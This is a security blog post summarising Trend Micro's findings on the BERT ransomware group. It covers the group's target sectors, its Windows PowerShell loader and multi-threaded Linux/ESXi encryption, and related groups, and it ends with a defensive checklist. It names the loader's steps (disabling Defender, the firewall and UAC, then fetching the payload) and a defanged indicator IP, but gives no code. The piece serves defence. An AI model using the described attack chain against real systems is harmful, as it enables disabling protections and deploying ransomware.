BERT Ransomware: Trend Micro Uncovers a Fast-Moving Threat Targeting Healthcare, Tech, and More

In the relentless chess game between cyber defenders and digital criminals, a new player just flipped the board—and it’s moving faster than most teams can respond. Meet BERT, the latest ransomware group flagged by Trend Micro, and a wake-up call for anyone managing security in critical sectors like healthcare, technology, and event services. If you think ransomware is an “old threat” with predictable patterns, BERT is here to prove otherwise.

What sets this group apart isn’t sophisticated code or exotic exploits; it’s speed, simplicity, and ruthless efficiency. If your organization touches Windows or Linux systems—and let’s be real, whose doesn’t?—this is one threat you can’t afford to ignore.

Let’s break down what makes BERT so dangerous, what Trend Micro uncovered, and—most importantly—how you can proactively shield your organization from becoming the next headline.

What Is BERT Ransomware? Understanding the Threat Actor Behind Water Pombero

First, a little context: The cybersecurity world is constantly tracking new threat actors. BERT is the codename for a ransomware group Trend Micro has been monitoring since April 2024, also known in some circles as “Water Pombero.” Unlike the cartoon character you might recall from your childhood, this BERT is no joke.

A Global Campaign Across Critical Industries

Geographic Reach: Asia, Europe, and the US are all in BERT’s crosshairs.
Target Sectors: Healthcare, technology, and event services are at the highest risk. Think hospitals, tech companies, and even event management platforms—places where downtime can be catastrophic.
Systems Targeted: Both Windows and Linux environments, including virtualized infrastructure running VMware ESXi.

Here’s why that matters: A group attacking both major operating systems and critical industries is poised to cause maximum disruption. That’s not just theoretical; it’s happening right now.

How Does BERT Ransomware Work? Tactics and Tools Explained

BERT stands out not by reinventing the ransomware wheel, but by stripping things down to the essentials—and executing them with lightning speed. Let’s unpack their playbook.

Attacking Windows Systems: Simple Scripts, Devastating Impact

When targeting Windows, BERT leverages:

Straightforward Code Structure: The ransomware code uses simple string-matching logic to identify and terminate specific processes—no obfuscation, no fancy tricks.
PowerShell Loader Script: Trend Micro discovered a PowerShell script acting as a loader for BERT’s ransomware payload. This script does several key things:
- Escalates privileges (gaining higher system access)
- Disables Windows Defender
- Turns off the firewall
- Disables User Account Control
- Downloads and runs the ransomware from a remote IP: 185[.]100[.]157[.]74
Unclear Initial Access: Trend Micro notes that the initial method BERT uses to enter systems is still unknown, but common avenues include phishing emails, exploiting unpatched vulnerabilities, or brute-forcing weak passwords.

Why is this script so effective? Because the attackers leverage basic, “off-the-shelf” scripting tools, which often slip past traditional security controls—especially when organizations overlook PowerShell monitoring and privilege management.

Attacking Linux Systems: Fast, Multi-Threaded Encryption

BERT’s approach to Linux is a masterclass in efficiency:

50 Concurrent Threads: The ransomware encrypts files across the system using 50 threads simultaneously. That means an attack can lock down an entire server in minutes.
ESXi Virtual Machine Shutdown: BERT can identify and forcefully power down VMware ESXi virtual machines, which are widely used in data centers to host multiple virtual servers.
Minimal Detection Window: By moving quickly and utilizing simple, non-obfuscated binaries, BERT reduces the chances of being caught before the encryption is complete.

Let me be clear: Virtual environments are often viewed as “safer.” BERT shatters that illusion. If you run VMs for critical operations, you need eyes on this threat.

Why BERT Ransomware Is So Dangerous: Low-Code, High Impact

You might wonder: If BERT doesn’t use advanced techniques, what makes it so scary? In cybersecurity, speed kills. BERT’s “low-code” approach means:

Fewer Indicators of Compromise: Traditional endpoint protection often flags unusual binaries or obfuscated code. BERT avoids both.
Rapid Execution: The less complicated the attack chain, the less time defenders have to react.
Easy for Attackers to Use: The barrier to entry is low, meaning even inexperienced actors can deploy BERT effectively.
Constant Evolution: The developers are continuously updating and improving the ransomware, making it harder for static defenses to keep up.

As Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting, explains:

“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder.”

Simply put: BERT doesn’t need to be sophisticated if it’s faster and more adaptable than your security team.

Real-World Impacts: Who’s in the Crosshairs?

While BERT’s campaign is global, certain industries and systems face outsized risks:

Healthcare: Hospitals can’t afford downtime—lives literally hang in the balance. And with many relying on legacy systems, they’re prime targets.
Technology: IT and SaaS providers often act as supply-chain conduits; a breach here can cascade downstream.
Event Services: From major ticketing systems to online conference platforms, event businesses increasingly rely on digital infrastructure.

A cautionary note: Even if your organization doesn’t fit these categories, BERT’s methods exploit universal weaknesses: poor password hygiene, inadequate monitoring, and lax privilege controls.

The Rise of New Ransomware Models: BERT Isn’t Alone

BERT is part of a broader trend: a new wave of ransomware groups embracing speed, simplicity, and modularity over heavy obfuscation. Recent examples include:

Gunra Ransomware

Spotted in April 2024
Appends .encrt to encrypted files
Drops ransom notes named r3adm3.txt
Targets: Healthcare, electronics, beverage manufacturing

Silent Ransomware Group

Specializes in callback phishing emails
Masquerades as legitimate businesses
Steals sensitive data first, then delivers ransom demands

Mamona Ransomware

Hybrid model: Quick attacks, often operating offline
Deletes traces post-execution, making forensics difficult

“Loud-Lockers” vs. “Quiet Siphoners”

Sanchit Vir Gogia, chief analyst at Greyhound Research, sums up the trend:

“CISOs are now contending with ‘loud-lockers’ like Gunra that use multithreading and anti-recovery routines to lock down systems instantly, and ‘quiet siphoners’ like Silent Ransom who avoid malware entirely. Groups like Mamona represent a third hybrid—quick but malware-light, often operating offline and deleting traces post-execution.”

This evolution demands not only traditional antivirus or EDR but layered, flexible, and proactive defense strategies.

How to Defend Against BERT Ransomware: Practical Steps for Security Teams

If you’re a CISO, SOC lead, or IT manager, you’re probably wondering: “What can we actually do to stop BERT and similar threats?” Here’s a battle-tested checklist for modern ransomware defense:

1. Monitor PowerShell and Admin Activity

Flag unusual PowerShell sessions—especially those attempting to download remote code or disable security features.
Watch for User Account Control (UAC) bypass attempts.
Audit admin privilege usage and restrict where possible.

2. Lock Down Virtual Environments

Monitor ESXi and vCenter logs for bulk VM shutdowns or unusual activity.
Isolate management interfaces from the main network.
Limit who has access to hypervisor controls.

3. Deploy Canary Files as Tripwires

Set up decoy files across critical endpoints and servers.
Alert on any access or modification—since ransomware typically “touches” everything it can.

4. Enforce PowerShell Constrained Language Mode

Limit PowerShell capabilities to block potentially malicious scripts.
Just-in-time admin privileges: Only grant elevated access as needed, and revoke immediately after.

5. Layered Security Architecture

Use EDR/XDR solutions (learn more about EDR/XDR on Microsoft)
Segment your network to prevent lateral movement.
Strict privilege controls: Apply the principle of least privilege everywhere.

6. Backup Strategy

Maintain isolated, regularly tested backups
Encrypt backups and store them offline or in immutable cloud storage.
Test restores routinely to ensure they work under pressure.

7. Patch and Harden Systems

Patch vulnerabilities quickly—especially internet-facing services.
Disable unused services and accounts
Implement application allowlisting to control what can execute on endpoints.

8. Phishing and Awareness Training

Educate employees to spot phishing emails and social engineering tactics.
Test with simulated attacks to reinforce muscle memory.

9. Proactive Threat Hunting and Incident Response Planning

Conduct regular threat hunts for early indicators of compromise.
Scripted playbooks for rapid containment—aim for response within 15 minutes of detection.

10. Assume Breaches Will Happen

Prepare for fast detection and response, not just prevention.
Review incident response plans regularly and run tabletop exercises.

Want more on ransomware response? The CISA Ransomware Guide is an excellent, actionable resource.

Expert Insights: Why Fast, Simple Ransomware Is the New Normal

Many organizations assume advanced attacks require advanced defenses. But as recent events show, even “low-code” ransomware like BERT can topple enterprise security postures. Here’s what the experts recommend:

Prioritize containment over total prevention: Accept that dedicated attackers will get in—your focus should be limiting the damage.
Automate detection and isolation workflows—speed is your friend.
Invest in deception and process forensics: Leaving digital “boobytraps” (canary files, decoy accounts, honeypots) can buy precious time.
Upgrade from legacy AV to integrated EDR/XDR: These platforms can correlate behaviors across endpoints, servers, cloud, and network traffic.

Above all, focus on organizational readiness. Even the best tech won’t help if your team can’t respond fast.

Frequently Asked Questions About BERT Ransomware

Q: What is BERT ransomware and why is it a threat?
A: BERT is a ransomware group tracked by Trend Micro since April 2024, targeting critical sectors across Asia, Europe, and the US. It stands out for its speed, simplicity, and ability to disable defenses rapidly—making it a major risk for organizations running Windows or Linux systems.

Q: How does BERT ransomware gain access to systems?
A: The exact initial access vector isn’t confirmed, but likely methods include phishing emails, exploiting unpatched vulnerabilities, or brute-forcing weak passwords. Once inside, it uses PowerShell scripts and privilege escalation to deploy the payload.

Q: How does BERT ransomware affect virtual machines?
A: On Linux systems, BERT can forcibly shut down ESXi virtual machines before encrypting their data—making recovery far more complicated for organizations that rely on virtualization.

Q: What steps can companies take to prevent BERT ransomware attacks?
A: Key steps include monitoring PowerShell activity, enforcing least privilege, segmenting networks, patching vulnerabilities, maintaining isolated backups, deploying EDR/XDR tools, educating staff, and having an incident response plan in place.

Q: Where can I learn more about ransomware defense best practices?
A: Authoritative resources include CISA’s Ransomware Guide, Trend Micro’s threat intelligence, and Microsoft’s security documentation.

Key Takeaways: How to Stay Ahead of Fast-Moving Ransomware Like BERT

The cybersecurity landscape is shifting—attackers no longer need elaborate malware to cause real damage. BERT proves that speed, adaptability, and exploiting common misconfigurations can outpace even well-resourced security teams.

If you remember one thing:
Prepare for fast, low-code ransomware attacks by investing in layered, proactive, and well-practiced defense strategies. Monitor aggressively, restrict privileges, isolate backups, and automate your response. Assume breaches will happen—and make sure your team can move just as fast as the attackers.

Ready to dig deeper? Subscribe for more actionable cybersecurity insights, or explore our latest threat intelligence posts to stay a step ahead of tomorrow’s ransomware threats.

Stay safe, stay vigilant, and never underestimate the power of simple—but smart—adversaries in the evolving world of ransomware.

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring!

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!